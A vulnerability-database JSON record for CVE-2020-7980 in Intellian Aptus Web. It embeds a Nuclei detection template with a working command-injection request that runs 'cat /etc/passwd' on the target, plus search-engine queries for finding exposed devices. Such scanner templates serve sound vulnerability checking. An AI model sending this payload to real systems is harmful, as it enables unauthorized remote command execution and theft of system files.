{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2020-7980/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2020-7980/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2020-7980/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2020-7980/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2020-7980/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2020-7980"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2020-7980"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.82544,
      "kev": false,
      "percentile": 0.99651
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2020/CVE-2020-7980.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2020-7980\n\ninfo:\n  name: Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution\n  author: ritikchaddha\n  severity: critical\n  description: 'Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.'\n  impact: |\n    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.\n  remediation: |\n    Upgrade to a patched version of Satellian Intellian Aptus Web (version > 1.24).\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-7980\n    - https://sku11army.blogspot.com/2020/01/intellian-aptus-web-rce-intellian.html\n    - https://github.com/Xh4H/Satellian-CVE-2020-7980\n    - http://packetstormsecurity.com/files/156143/Satellian-1.12-Remote-Code-Execution.html\n    - https://github.com/0xT11/CVE-POC\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2020-7980\n    cwe-id: CWE-78\n    epss-score: 0.82544\n    epss-percentile: 0.9965\n    cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: intelliantech\n    product: aptus_web\n    shodan-query:\n      - http.title:\"Intellian Aptus Web\"\n      - http.title:\"intellian aptus web\"\n    fofa-query: title=\"intellian aptus web\"\n    google-query: intitle:\"intellian aptus web\"\n  tags: cve2020,cve,intellian,aptus,packetstorm,satellian,rce,intelliantech,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /cgi-bin/libagent.cgi?type=J HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Cookie: ctr_t=0; sid=123456789\n\n        {\"O_\": \"A\", \"F_\": \"EXEC_CMD\", \"S_\": 123456789, \"P1_\": {\"Q\": \"cat /etc/passwd\", \"F\": \"EXEC_CMD\"}, \"V_\": 1}\n\n    host-redirects: true\n    max-redirects: 2\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:[x*]:0:0\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100d80338e16b19821790e549bf0693cd709f339a8f1cff4c2e75ebb17f361e7f80022100a8e70e936f3012d22404b08f81992e98a9d2be71effa264710dfd6582696480f:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2020-7980"
}